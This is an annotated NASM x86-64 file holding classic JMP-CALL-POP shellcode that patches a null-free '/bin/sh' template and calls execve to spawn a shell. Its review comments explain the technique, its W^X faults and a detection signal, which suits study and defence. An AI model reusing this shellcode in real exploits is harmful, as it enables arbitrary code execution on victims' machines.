global _start 

section .text

; _start: program entry point (NASM / Intel syntax, 64-bit registers).
; It does no work itself: it jumps forward to find_address, whose CALL pushes
; the address of the bytes placed right after it (shell_path_string).
_start:

	; Forward jump to the CALL that sits immediately before the string data.
	jmp find_address

; shellcode: patches the string template in place, then issues syscall 59
; (execve on Linux x86-64).
; Entered via CALL from find_address, so the top of the stack holds the
; address of shell_path_string.
;
; Buffer layout after patching (offsets from rdi):
;   +0   "/bin/sh"         path passed in rdi
;   +7   'A'   -> 0x00     string terminator
;   +8   'B'*8 -> rdi      argv[0] = pointer to the path
;   +16  'C'*8 -> 0        argv[1] = NULL; the same slot is the envp array
;
; NOTE(review): all three stores write into data declared under
; "section .text". With default linker settings that section is mapped
; read+execute, so a standalone build would be expected to fault at the
; first store. The routine depends on memory that is both writable and
; executable, which W^X / NX policies are meant to rule out.
; NOTE(review): there is no failure path. If the syscall returns, execution
; falls through into find_address and the whole sequence runs again.
shellcode:
	; rax = 0: source of the zero byte and zero qword stored below.
	xor rax, rax

	; Pop the return address pushed by CALL; rdi = &shell_path_string.
	pop rdi

	; Overwrite the 'A' placeholder with 0x00 (ah is 0 after the xor above)
	; so that "/bin/sh" becomes a terminated string.
	mov [rdi +7], byte ah

	; Overwrite the 'B' placeholder with the string's own address (argv[0]).
	mov [rdi +8], rdi

	; Overwrite the 'C' placeholder with a zero qword (NULL terminator).

	mov [rdi +16], rax

	; rsi = argv -> { path, NULL }; rdx = envp -> { NULL }.

	lea rsi, [rdi +8]
	lea rdx, [rdi +16]

	; rax is still 0 here, so the add leaves 59 in rax.
	; Resulting call: execve("/bin/sh", {"/bin/sh", NULL}, {NULL}).
	; A shell exec with an empty environment is uncommon in normal process
	; launches, which makes it a useful signal in exec telemetry.
	add rax, 59
	syscall


; find_address: the CALL pushes the address of the next byte, which is the
; start of shell_path_string, and transfers control to shellcode. shellcode
; pops that address instead of returning, so nothing after the CALL is ever
; executed as code on the normal path.
find_address:
	call shellcode

; 24-byte template, patched at run time by shellcode:
;   "/bin/sh"  7 bytes  path
;   'A'        1 byte   becomes the string terminator
;   'B' * 8    8 bytes  becomes the pointer to the path (argv[0])
;   'C' * 8    8 bytes  becomes NULL (argv terminator, also used as envp)
; No terminator is stored in the assembled bytes; the placeholders stand in
; for the zero values until they are written (presumably to keep the image
; free of 0x00 bytes; confirm against the author's intent).
shell_path_string:	db	"/bin/shABBBBBBBBCCCCCCCC"
